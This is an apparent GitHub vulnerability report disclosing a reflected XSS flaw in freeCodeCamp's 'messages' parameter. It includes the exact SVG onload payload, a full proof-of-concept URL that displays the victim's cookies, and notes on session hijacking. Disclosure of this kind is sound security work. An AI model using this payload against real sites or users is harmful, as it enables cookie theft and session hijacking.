You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Steps of Reproduction:
1: Open the Final POC URL link in the firefox browser.
Hopefully, you should see an alert box with the cookies inside, demonstrating the POC.
Attack Scenario: An attacker can craft a malicious link and can do malicious activities such as hijacking sessions, redirecting the victim to some malicious URL, force file download, etc.
Browser used: Firefox 72.0.1 (64-bit)
OS: Windows 8.1 (64 bit) / Ubuntu 18.04
Testing: Manual Fuzzing
--POC--
Bug: Reflected XSS
Vulnerable URL: https://www.freecodecamp.org
Vulnerable Parameter : messages
Payload : success[0]%3D%2520Happy%2520Hacking%2521%3Csvg/onload=alert(document.cookie)%3E
Final POC URL : https://www.freecodecamp.org/learn/?messages=success[0]%3D%2520Happy%2520Hacking%2521%3Csvg/onload=alert(document.cookie)%3E
Steps of Reproduction:
1: Open the Final POC URL link in the firefox browser.
Hopefully, you should see an alert box with the cookies inside, demonstrating the POC.
Attack Scenario: An attacker can craft a malicious link and can do malicious activities such as hijacking sessions, redirecting the victim to some malicious URL, force file download, etc.
Reference:
For more details, please refer to https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)